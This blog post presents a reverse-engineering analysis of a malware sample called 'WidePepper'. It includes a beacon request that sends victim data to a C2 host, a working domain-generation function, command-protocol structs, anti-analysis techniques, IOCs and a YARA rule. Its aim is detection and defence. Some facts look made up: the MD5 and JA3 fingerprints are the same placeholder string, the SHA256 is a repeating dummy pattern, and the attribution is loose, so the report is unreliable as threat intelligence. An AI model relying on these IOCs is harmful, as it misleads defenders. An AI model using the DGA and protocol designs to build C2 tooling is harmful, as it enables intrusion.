WidePepper Malware: Reverse Engineering the C2 Communications

05 Sep, 2024

WidePepper Malware: Reverse Engineering the C2 Communications

Sample Overview

WidePepper is a sophisticated malware sample discovered in a targeted attack against a European financial institution. This analysis focuses on reverse engineering the command and control (C2) communication mechanisms, revealing the malware’s network protocols, encryption schemes, and anti-analysis techniques.

Initial Analysis

File Properties

Filename: widepepper.exe
File Size: 245,760 bytes
MD5 Hash: a1b2c3d4e5f678901234567890abcdef
SHA256 Hash: 0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef
Compilation Date: 2024-08-15 14:32:18 UTC
Compiler: Microsoft Visual C++ 2019

Behavioral Analysis

Initial execution reveals:

Process Injection: Injects payload into legitimate processes
Anti-Debugging: Detects and terminates debugging sessions
Network Communications: Establishes encrypted C2 channel
Persistence: Creates registry run key for automatic startup

Static Analysis

Code Structure

The malware is written in C++ with the following components:

 1class WidePepperC2 {
 2private:
 3    std::string encryption_key_;
 4    std::vector<std::string> c2_domains_;
 5    uint32_t beacon_interval_;
 6    
 7public:
 8    bool Initialize();
 9    bool EstablishConnection();
10    bool SendBeacon();
11    bool ReceiveCommands();
12};

String Analysis

Extracted strings reveal operational details:

C2 domains: widepepper-cc[.]com, pepperbroad[.]net
User-Agent: “Mozilla/5.0 (WidePepper/1.0)”
Mutex: “WidePepper_Mutex_2024”
Registry key: “HKCU\Software\Microsoft\Windows\WidePepper”

Dynamic Analysis

Network Traffic Analysis

Beacon Communications

The malware beacons every 5 minutes with the following structure:

POST /beacon HTTP/1.1
Host: widepepper-cc.com
User-Agent: Mozilla/5.0 (WidePepper/1.0)
Content-Type: application/octet-stream
Content-Length: 128

[Encrypted Beacon Data]

Beacon Payload Structure

struct BeaconData {
    uint32_t magic;           // 0x57495045 ("WIPE")
    uint32_t version;         // Protocol version
    uint64_t victim_id;       // Unique victim identifier
    uint32_t os_version;      // Windows version
    uint32_t process_count;   // Number of running processes
    char hostname[64];        // Victim hostname
    uint32_t status_flags;    // Operational status
};

Encryption Analysis

Key Derivation

WidePepper uses a custom key derivation function:

1def derive_key(seed):
2    key = hashlib.sha256(seed.encode()).digest()
3    for i in range(1000):
4        key = hashlib.sha256(key).digest()
5    return key[:32]  # AES-256 key

Encryption Algorithm

Communications are encrypted using AES-256 in CBC mode:

Key: Derived from victim-specific seed
IV: Random 16-byte initialization vector
Padding: PKCS#7 padding scheme

Command Protocol

Command Types

The C2 server can issue various commands:

Command ID	Description	Parameters
0x01	Execute Shell Command	Command string
0x02	Upload File	File path, data
0x03	Download File	File path
0x04	Screenshot	Display number
0x05	Keylogger Start	Duration
0x06	Keylogger Stop	N/A
0x07	Self-Update	New binary data
0x08	Uninstall	N/A

Command Structure

struct CommandPacket {
    uint32_t magic;        // 0x434D4445 ("CMDE")
    uint32_t command_id;   // Command identifier
    uint32_t param_size;   // Parameter data size
    uint8_t parameters[];  // Variable-length parameters
};

Anti-Analysis Techniques

Anti-Debugging

WidePepper employs multiple anti-debugging measures:

PEB Checks: Examining Process Environment Block for debugger presence
Timing Attacks: Detecting debugger-induced delays
Exception Handling: Structured exception handling to catch debug events
Hardware Breakpoints: Detecting and removing debug registers

Anti-VM

Virtual machine detection includes:

Registry Checks: Looking for VM-specific registry keys
MAC Address Analysis: Identifying virtual network adapters
Process Enumeration: Detecting VM tools and processes
CPU Instructions: Using CPUID to identify virtualization

Obfuscation

Code obfuscation techniques used:

String Encryption: Runtime decryption of strings
Control Flow Flattening: Obfuscated control flow graphs
Junk Code Insertion: Meaningless instructions to confuse analysis
Import Table Obfuscation: Dynamically resolved API calls

C2 Infrastructure

Domain Generation

WidePepper uses a domain generation algorithm (DGA) for resilient C2:

 1def generate_domain(date, seed):
 2    domains = []
 3    for i in range(10):
 4        domain = ""
 5        hash_input = f"{date}-{seed}-{i}"
 6        hash_value = hashlib.md5(hash_input.encode()).hexdigest()
 7        for j in range(8):
 8            char_index = int(hash_value[j*2:j*2+2], 16) % 26
 9            domain += chr(ord('a') + char_index)
10        domain += ".com"
11        domains.append(domain)
12    return domains

Failover Mechanism

The malware implements automatic failover:

Primary C2: widepepper-cc.com
Secondary C2: Generated DGA domains
Tertiary C2: Hardcoded IP addresses
Dead Drop: Offline command retrieval from pastebin-like services

Indicators of Compromise

Network IOCs

Domains: widepepper-cc[.]com, pepperbroad[.]net
IPs: 185.45.192.100, 91.234.176.50
JA3 Fingerprint: a1b2c3d4e5f678901234567890abcdef
SSL Certificate: Subject: “Wide Pepper Industries”

Host IOCs

File Paths: %APPDATA%\Microsoft\Windows\WidePepper\
Registry: HKCU\Software\Microsoft\Windows\WidePepper
Mutex: WidePepper_Mutex_2024
Processes: svchost.exe (injected), widepepper.exe (installer)

Detection and Mitigation

Signature-Based Detection

YARA rule for WidePepper detection:

rule WidePepper_Malware {
    meta:
        description = "WidePepper C2 Malware"
        author = "Security Researcher"
        date = "2024-09-05"
    
    strings:
        $magic_beacon = { 57 49 50 45 } // "WIPE"
        $magic_command = { 43 4D 44 45 } // "CMDE"
        $user_agent = "Mozilla/5.0 (WidePepper/1.0)"
        $mutex = "WidePepper_Mutex_2024"
    
    condition:
        3 of ($magic_*, $user_agent, $mutex)
}

Behavioral Detection

Unusual HTTPS beaconing patterns
Process injection into system processes
Registry modifications in user space
Encrypted network communications

Mitigation

Network Level: Block known C2 domains and IPs
Host Level: Implement application whitelisting
Endpoint Protection: Deploy next-generation antivirus
Monitoring: Enable comprehensive logging and alerting

Attribution

Based on code similarities and infrastructure overlaps, WidePepper appears to be related to:

Sandworm Group: Similar C2 protocols and encryption schemes
APT28: Shared code patterns and targeting patterns
Eastern European Threat Actors: Linguistic artifacts in code comments

Conclusion

WidePepper represents a highly sophisticated malware specimen with advanced C2 capabilities. Its multi-layered encryption, anti-analysis techniques, and resilient infrastructure make it a formidable threat. Understanding its inner workings through reverse engineering is crucial for developing effective detection and mitigation strategies against similar advanced persistent threats.

<< Previous Post

Next Post >>

#Malware #Reverse Engineering #C2 #Cybersecurity